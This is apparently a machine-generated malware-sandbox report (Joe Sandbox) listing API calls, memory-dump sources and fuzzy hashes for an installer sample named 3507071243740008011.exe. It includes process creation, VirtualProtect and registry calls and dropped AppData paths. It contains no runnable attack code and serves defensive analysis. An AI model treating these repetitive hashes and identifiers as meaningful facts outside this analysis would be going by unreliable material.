                                                  • GetLastError.KERNEL32(?,00000006,00000008,0000000A), ref: 00405846
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2641054685.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2641036423.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2641072711.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2641090860.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2641090860.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2641090860.0000000000436000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2641090860.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2641090860.0000000000468000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2641196627.000000000046A000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_3507071243740008011.jbxd
                                                  Similarity
                                                  • API ID: CreateDirectoryErrorLast
                                                  • String ID:
                                                  • API String ID: 1375471231-0
                                                  • Opcode ID: 5aaa147db34fee021f71137ce00f1128120fffe197b4e0338bd4cd09c611a0b2
                                                  • Instruction ID: 034de6f099216337e7681325378c15a49c0ca39433587e883605b7c80b1fabea
                                                  • Opcode Fuzzy Hash: 5aaa147db34fee021f71137ce00f1128120fffe197b4e0338bd4cd09c611a0b2
                                                  • Instruction Fuzzy Hash: C8C08C312155019AC7002F219F08B0B3A50AB20340F018439A946E00E0DA308424DD2D
                                                  APIs
                                                  • GlobalAlloc.KERNELBASE(00000040,?,?,1000155E,?), ref: 10001288
                                                  • lstrcpynW.KERNEL32(00000004,?,?,1000155E,?), ref: 1000129E
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2647896166.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.2647879368.0000000010000000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000000.00000002.2647911414.0000000010003000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000000.00000002.2647926767.0000000010005000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_3507071243740008011.jbxd
                                                  Similarity
                                                  • API ID: AllocGloballstrcpyn
                                                  • String ID:
                                                  • API String ID: 3204721840-0
                                                  • Opcode ID: afe45deed3c66b3a0d284d3e9d1cbe2d2ade6927c8a4a5a8782c6529d192ae48
                                                  • Instruction ID: e9b740c6d8b694a709cf830eb31a0a27ff166fa851e2490f9389895f26a0ffec
                                                  • Opcode Fuzzy Hash: afe45deed3c66b3a0d284d3e9d1cbe2d2ade6927c8a4a5a8782c6529d192ae48
                                                  • Instruction Fuzzy Hash: D8F0A5B5504220DFF701CFA4D888E5677E8FB48380B028655FA45D7228CB30A810CB65
                                                  APIs
                                                  • SetFilePointer.KERNELBASE(00000000,?,00000000,?,?), ref: 00402807
                                                    • Part of subcall function 004061C9: wsprintfW.USER32 ref: 004061D6
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2641054685.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2641036423.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2641072711.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2641090860.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2641090860.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2641090860.0000000000436000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2641090860.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2641090860.0000000000468000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2641196627.000000000046A000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_3507071243740008011.jbxd
                                                  Similarity
                                                  • API ID: FilePointerwsprintf
                                                  • String ID:
                                                  • API String ID: 327478801-0
                                                  • Opcode ID: 25119fcbc0a3167edfdd7d21477dcc65c7f09cfc642675181383071420b6b3c2
                                                  • Instruction ID: 338d2460217d73ea2e2bb91e7847e27d4a9cf2f97daf1e2edf82c438741940a9
                                                  • Opcode Fuzzy Hash: 25119fcbc0a3167edfdd7d21477dcc65c7f09cfc642675181383071420b6b3c2
                                                  • Instruction Fuzzy Hash: 83E09271B00104AFDB11EBA5AE498AE7779DB80314B24403BF101F50D2CA794E119E2D
                                                  APIs
                                                  • WritePrivateProfileStringW.KERNEL32(00000000,00000000,?,00000000), ref: 0040233D
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2641054685.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2641036423.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2641072711.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2641090860.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2641090860.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2641090860.0000000000436000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2641090860.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2641090860.0000000000468000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2641196627.000000000046A000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_3507071243740008011.jbxd
                                                  Similarity
                                                  • API ID: PrivateProfileStringWrite
                                                  • String ID:
                                                  • API String ID: 390214022-0
                                                  • Opcode ID: 611604a497d22fd9b22a7666efc1e18301a5eb9844a24c96cea5756000cc0278
                                                  • Instruction ID: f718b570c03cd879152723008abd35f840e0595a9afadee28286a7759bd10add
                                                  • Opcode Fuzzy Hash: 611604a497d22fd9b22a7666efc1e18301a5eb9844a24c96cea5756000cc0278
                                                  • Instruction Fuzzy Hash: A1E086719042686EE7303AF10F8EDBF50989B44348B55093FBA01B61C2D9FC0D46826D
                                                  APIs
                                                  • RegCreateKeyExW.KERNELBASE(00000000,?,00000000,00000000,00000000,?,00000000,?,00000000,?,?,?,00402CE8,00000000,?,?), ref: 00406146
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2641054685.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2641036423.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2641072711.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2641090860.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2641090860.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2641090860.0000000000436000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2641090860.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2641090860.0000000000468000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2641196627.000000000046A000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_3507071243740008011.jbxd
                                                  Similarity
                                                  • API ID: Create
                                                  • String ID:
                                                  • API String ID: 2289755597-0
                                                  • Opcode ID: e8292e86e66d8bfc399a73dea3ede4946860b06fd3b50e0b30bb299c90100862
                                                  • Instruction ID: 190238b8cd19dd4efab6c9cc8903e135eae53195524c7f3a74b1c4143961a507
                                                  • Opcode Fuzzy Hash: e8292e86e66d8bfc399a73dea3ede4946860b06fd3b50e0b30bb299c90100862
                                                  • Instruction Fuzzy Hash: A1E0E6B2010109BEDF095F50DD0AD7B371DEB04704F01452EFA57D5091E6B5A9309679
                                                  APIs
                                                  • WriteFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,?,?,004032DE,000000FF,00416A00,?,00416A00,?,?,00000004,00000000), ref: 00405E3A
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2641054685.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2641036423.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2641072711.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2641090860.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2641090860.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2641090860.0000000000436000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2641090860.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2641090860.0000000000468000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2641196627.000000000046A000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_3507071243740008011.jbxd
                                                  Similarity
                                                  • API ID: FileWrite
                                                  • String ID:
                                                  • API String ID: 3934441357-0
                                                  • Opcode ID: 02dc4867d73beddbae7b6aa94ca18310df5187db1130d79069d379e72bcbc858
                                                  • Instruction ID: 087a0ba252b1651b23da729bb4e18d02a4b8a10c1fd3406c9ee2a7e33144c981
                                                  • Opcode Fuzzy Hash: 02dc4867d73beddbae7b6aa94ca18310df5187db1130d79069d379e72bcbc858
                                                  • Instruction Fuzzy Hash: 96E0463221021AABCF10AF50CC04AAB3B6CFB003A0F004432B955E2050D230EA208AE9
                                                  APIs
                                                  • ReadFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,?,?,00403328,00000000,00000000,0040314C,?,00000004,00000000,00000000,00000000), ref: 00405E0B
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2641054685.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2641036423.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2641072711.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2641090860.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2641090860.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2641090860.0000000000436000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2641090860.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2641090860.0000000000468000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2641196627.000000000046A000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_3507071243740008011.jbxd
                                                  Similarity
                                                  • API ID: FileRead
                                                  • String ID:
                                                  • API String ID: 2738559852-0
                                                  • Opcode ID: 7739e01b11ed9e02f3c754170f73e593db9a2046c62570b976e55369a775b70d
                                                  • Instruction ID: e221de633d5b74da9fce23a9c995dc3304d5126a795d503f9c3389b6b2e666c2
                                                  • Opcode Fuzzy Hash: 7739e01b11ed9e02f3c754170f73e593db9a2046c62570b976e55369a775b70d
                                                  • Instruction Fuzzy Hash: 4DE0EC3221025AABDF10AF95DC00EEB7B6CEB05360F044436FA65E7150D631EA619BF8
                                                  APIs
                                                  • VirtualProtect.KERNELBASE(1000405C,00000004,00000040,1000404C), ref: 100027E0
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2647896166.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.2647879368.0000000010000000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000000.00000002.2647911414.0000000010003000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000000.00000002.2647926767.0000000010005000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_3507071243740008011.jbxd
                                                  Similarity
                                                  • API ID: ProtectVirtual
                                                  • String ID:
                                                  • API String ID: 544645111-0
                                                  • Opcode ID: 872da592a6d7a810a82f92163ecc1a118f8c9402d7722bf40bb7f7edf15a1654
                                                  • Instruction ID: 43a77b614ff4017466e57d7f63f0e44ab05d53355a3bca00642047650885b550
                                                  • Opcode Fuzzy Hash: 872da592a6d7a810a82f92163ecc1a118f8c9402d7722bf40bb7f7edf15a1654
                                                  • Instruction Fuzzy Hash: C5F0A5F15057A0DEF350DF688C847063BE4E3583C4B03852AE368F6269EB344454DF19
                                                  APIs
                                                  • GetPrivateProfileStringW.KERNEL32(00000000,?,?,?,000003FF,00000000), ref: 00402379
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2641054685.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2641036423.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2641072711.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2641090860.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2641090860.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2641090860.0000000000436000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2641090860.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2641090860.0000000000468000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2641196627.000000000046A000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_3507071243740008011.jbxd
                                                  Similarity
                                                  • API ID: PrivateProfileString
                                                  • String ID:
                                                  • API String ID: 1096422788-0
                                                  • Opcode ID: c6a8cbcbc31f6e602369a5318af1bf20fc7f19c6dcae62e72b5fc0541244e301
                                                  • Instruction ID: 69d349e7d285c822079f9e4bf846872a9f1ef35916f06b7134f04da07b3971da
                                                  • Opcode Fuzzy Hash: c6a8cbcbc31f6e602369a5318af1bf20fc7f19c6dcae62e72b5fc0541244e301
                                                  • Instruction Fuzzy Hash: 25E0487080420CAADB106FA1CE099BE7A64AF00340F104439F5907B0D1E6FC84415745
                                                  APIs
                                                  • RegOpenKeyExW.KERNELBASE(00000000,00000000,00000000,?,?,0042C228,?,?,0040617D,0042C228,00000000,?,?,Call,?), ref: 00406113
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2641054685.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2641036423.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2641072711.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2641090860.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2641090860.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2641090860.0000000000436000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2641090860.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2641090860.0000000000468000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2641196627.000000000046A000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_3507071243740008011.jbxd
                                                  Similarity
                                                  • API ID: Open
                                                  • String ID:
                                                  • API String ID: 71445658-0
                                                  APIs
                                                  • SendMessageW.USER32(00000028,?,00000001,00404077), ref: 0040425A
                                                  Similarity
                                                  • API ID: MessageSend
                                                  • String ID:
                                                  • API String ID: 3850602802-0
                                                  APIs
                                                  • SetFilePointer.KERNELBASE(?,00000000,00000000,00403088,?,?,00000006,00000008,0000000A), ref: 00403339
                                                  Similarity
                                                  • API ID: FilePointer
                                                  • String ID:
                                                  • API String ID: 973152223-0
                                                  APIs
                                                  • ShellExecuteExW.SHELL32(?), ref: 004058B9
                                                  Similarity
                                                  • API ID: ExecuteShell
                                                  • String ID:
                                                  • API String ID: 587946157-0
                                                  APIs
                                                    • Part of subcall function 004052E6: lstrlenW.KERNEL32(0042C228,00000000,0041D800,74DF23A0,?,?,?,?,?,?,?,?,?,0040325E,00000000,?), ref: 0040531E
                                                    • Part of subcall function 004052E6: lstrlenW.KERNEL32(0040325E,0042C228,00000000,0041D800,74DF23A0,?,?,?,?,?,?,?,?,?,0040325E,00000000), ref: 0040532E
                                                    • Part of subcall function 004052E6: lstrcatW.KERNEL32(0042C228,0040325E,0040325E,0042C228,00000000,0041D800,74DF23A0), ref: 00405341
                                                    • Part of subcall function 004052E6: SetWindowTextW.USER32(0042C228,0042C228), ref: 00405353
                                                    • Part of subcall function 004052E6: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405379
                                                    • Part of subcall function 004052E6: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405393
                                                    • Part of subcall function 004052E6: SendMessageW.USER32(?,00001013,?,00000000), ref: 004053A1
                                                    • Part of subcall function 00405867: CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00430250,Error launching installer), ref: 00405890
                                                    • Part of subcall function 00405867: CloseHandle.KERNEL32(?), ref: 0040589D
                                                  • CloseHandle.KERNEL32(?,?,?,?,?,?), ref: 00401F47
                                                    • Part of subcall function 0040670D: WaitForSingleObject.KERNEL32(?,00000064), ref: 0040671E
                                                    • Part of subcall function 0040670D: GetExitCodeProcess.KERNEL32(?,?), ref: 00406740
                                                    • Part of subcall function 004061C9: wsprintfW.USER32 ref: 004061D6
                                                  Similarity
                                                  • API ID: MessageSend$CloseHandleProcesslstrlen$CodeCreateExitObjectSingleTextWaitWindowlstrcatwsprintf
                                                  • String ID:
                                                  • API String ID: 2972824698-0
                                                  APIs
                                                  • GlobalAlloc.KERNEL32(00000040,?,10001019,00000001), ref: 1000102F
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2647896166.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.2647879368.0000000010000000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000000.00000002.2647911414.0000000010003000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000000.00000002.2647926767.0000000010005000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_3507071243740008011.jbxd
                                                  Similarity
                                                  • API ID: AllocGlobal
                                                  • String ID:
                                                  • API String ID: 3761449716-0
                                                  APIs
                                                  • GlobalAlloc.KERNELBASE(00000040,?,1000123B,?,100012DF,00000019,100011BE,-000000A0), ref: 10001225
                                                  Similarity
                                                  • API ID: AllocGlobal
                                                  • String ID:
                                                  • API String ID: 3761449716-0
                                                  APIs
                                                  • GetDlgItem.USER32(?,00000403), ref: 00405483
                                                  • GetDlgItem.USER32(?,000003EE), ref: 00405492
                                                  • GetClientRect.USER32(?,?), ref: 004054CF
                                                  • GetSystemMetrics.USER32(00000002), ref: 004054D6
                                                  • SendMessageW.USER32(?,00001061,00000000,?), ref: 004054F7
                                                  • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 00405508
                                                  • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 0040551B
                                                  • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 00405529
                                                  • SendMessageW.USER32(?,00001024,00000000,?), ref: 0040553C
                                                  • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 0040555E
                                                  • ShowWindow.USER32(?,00000008), ref: 00405572
                                                  • GetDlgItem.USER32(?,000003EC), ref: 00405593
                                                  • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 004055A3
                                                  • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 004055BC
                                                  • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 004055C8
                                                  • GetDlgItem.USER32(?,000003F8), ref: 004054A1
                                                    • Part of subcall function 0040424C: SendMessageW.USER32(00000028,?,00000001,00404077), ref: 0040425A
                                                  • GetDlgItem.USER32(?,000003EC), ref: 004055E5
                                                  • CreateThread.KERNEL32(00000000,00000000,Function_000053B9,00000000), ref: 004055F3
                                                  • CloseHandle.KERNEL32(00000000), ref: 004055FA
                                                  • ShowWindow.USER32(00000000), ref: 0040561E
                                                  • ShowWindow.USER32(?,00000008), ref: 00405623
                                                  • ShowWindow.USER32(00000008), ref: 0040566D
                                                  • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004056A1
                                                  • CreatePopupMenu.USER32 ref: 004056B2
                                                  • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 004056C6
                                                  • GetWindowRect.USER32(?,?), ref: 004056E6
                                                  • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004056FF
                                                  • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405737
                                                  • OpenClipboard.USER32(00000000), ref: 00405747
                                                  • EmptyClipboard.USER32 ref: 0040574D
                                                  • GlobalAlloc.KERNEL32(00000042,00000000), ref: 00405759
                                                  • GlobalLock.KERNEL32(00000000), ref: 00405763
                                                  • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405777
                                                  • GlobalUnlock.KERNEL32(00000000), ref: 00405797
                                                  • SetClipboardData.USER32(0000000D,00000000), ref: 004057A2
                                                  • CloseClipboard.USER32 ref: 004057A8
                                                  Similarity
                                                  • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                  • String ID: {
                                                  • API String ID: 590372296-366298937
                                                  APIs
                                                  • GetDlgItem.USER32(?,000003FB), ref: 00404735
                                                  • SetWindowTextW.USER32(00000000,?), ref: 0040475F
                                                  • SHBrowseForFolderW.SHELL32(?), ref: 00404810
                                                  • CoTaskMemFree.OLE32(00000000), ref: 0040481B
                                                  • lstrcmpiW.KERNEL32(Call,0042D248,00000000,?,?), ref: 0040484D
                                                  • lstrcatW.KERNEL32(?,Call), ref: 00404859
                                                  • SetDlgItemTextW.USER32(?,000003FB,?), ref: 0040486B
                                                    • Part of subcall function 004058C8: GetDlgItemTextW.USER32(?,?,00000400,004048A2), ref: 004058DB
                                                    • Part of subcall function 00406516: CharNextW.USER32(?,*?|<>/":,00000000,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\3507071243740008011.exe",0040334E,C:\Users\user\AppData\Local\Temp\,74DF3420,004035BF,?,00000006,00000008,0000000A), ref: 00406579
                                                    • Part of subcall function 00406516: CharNextW.USER32(?,?,?,00000000,?,00000006,00000008,0000000A), ref: 00406588
                                                    • Part of subcall function 00406516: CharNextW.USER32(?,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\3507071243740008011.exe",0040334E,C:\Users\user\AppData\Local\Temp\,74DF3420,004035BF,?,00000006,00000008,0000000A), ref: 0040658D
                                                    • Part of subcall function 00406516: CharPrevW.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\3507071243740008011.exe",0040334E,C:\Users\user\AppData\Local\Temp\,74DF3420,004035BF,?,00000006,00000008,0000000A), ref: 004065A0
                                                  • GetDiskFreeSpaceW.KERNEL32(0042B218,?,?,0000040F,?,0042B218,0042B218,?,00000001,0042B218,?,?,000003FB,?), ref: 0040492E
                                                  • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404949
                                                    • Part of subcall function 00404AA2: lstrlenW.KERNEL32(0042D248,0042D248,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404B43
                                                    • Part of subcall function 00404AA2: wsprintfW.USER32 ref: 00404B4C
                                                    • Part of subcall function 00404AA2: SetDlgItemTextW.USER32(?,0042D248), ref: 00404B5F
                                                  Similarity
                                                  • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                  • String ID: A$C:\Users\user\AppData\Roaming\pechay\transskribere\jon$Call
                                                  • API String ID: 2624150263-251418098
                                                  APIs
                                                    • Part of subcall function 1000121B: GlobalAlloc.KERNELBASE(00000040,?,1000123B,?,100012DF,00000019,100011BE,-000000A0), ref: 10001225
                                                  • GlobalAlloc.KERNEL32(00000040,00001CA4), ref: 10001C24
                                                  • lstrcpyW.KERNEL32(00000008,?), ref: 10001C6C
                                                  • lstrcpyW.KERNEL32(00000808,?), ref: 10001C76
                                                  • GlobalFree.KERNEL32(00000000), ref: 10001C89
                                                  • GlobalFree.KERNEL32(?), ref: 10001D83
                                                  • GlobalFree.KERNEL32(?), ref: 10001D88
                                                  • GlobalFree.KERNEL32(?), ref: 10001D8D
                                                  • GlobalFree.KERNEL32(00000000), ref: 10001F38
                                                  • lstrcpyW.KERNEL32(?,?), ref: 1000209C
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2647896166.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                   • Associated: 00000000.00000002.2647879368.0000000010000000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000000.00000002.2647911414.0000000010003000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000000.00000002.2647926767.0000000010005000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_3507071243740008011.jbxd
                                                  Similarity
                                                  • API ID: Global$Free$lstrcpy$Alloc
                                                  • String ID:
                                                  • API String ID: 4227406936-0
                                                  • Opcode ID: 5a24c136153c29b9d98a91a4f463aeb2504b823c6cdae7135cdbbdb8769d9cc1
                                                  • Instruction ID: 952ca616c20dc2fa21031af5d26a5f3ec91fa4f9dea92b18a1e2b318678e368b
                                                  • Opcode Fuzzy Hash: 5a24c136153c29b9d98a91a4f463aeb2504b823c6cdae7135cdbbdb8769d9cc1
                                                  • Instruction Fuzzy Hash: 10129C75D0064AEFEB20CFA4C8806EEB7F4FB083D4F61452AE565E7198D774AA80DB50
                                                  APIs
                                                  • CoCreateInstance.OLE32(004085E8,?,00000001,004085D8,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 0040217D
                                                  Strings
                                                  • C:\Users\user\AppData\Roaming\pechay\transskribere\jon\Ossicular, xrefs: 004021BD
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2641054685.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                   • Associated: 00000000.00000002.2641036423.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.2641072711.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.2641090860.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.2641090860.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.2641090860.0000000000436000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.2641090860.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.2641090860.0000000000468000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.2641196627.000000000046A000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_3507071243740008011.jbxd
                                                  Similarity
                                                  • API ID: CreateInstance
                                                  • String ID: C:\Users\user\AppData\Roaming\pechay\transskribere\jon\Ossicular
                                                  • API String ID: 542301482-3139891972
                                                  • Opcode ID: a3079df28c9350d7309c2a19df5477558aa8a9c325ce021c01e80fddd7990195
                                                  • Instruction ID: 2ba5a37aa1c239f751097cd18d9f1051e5d6a8806e2346af1523e8cbd5355f1b
                                                  • Opcode Fuzzy Hash: a3079df28c9350d7309c2a19df5477558aa8a9c325ce021c01e80fddd7990195
                                                  • Instruction Fuzzy Hash: 504139B5A00208AFCB10DFE4C988AAEBBB5FF48314F20457AF515EB2D1DB799941CB44
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2641054685.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                   • Associated: 00000000.00000002.2641036423.0000000000400000.00000002.00000001.01000000.00000003.sdmp
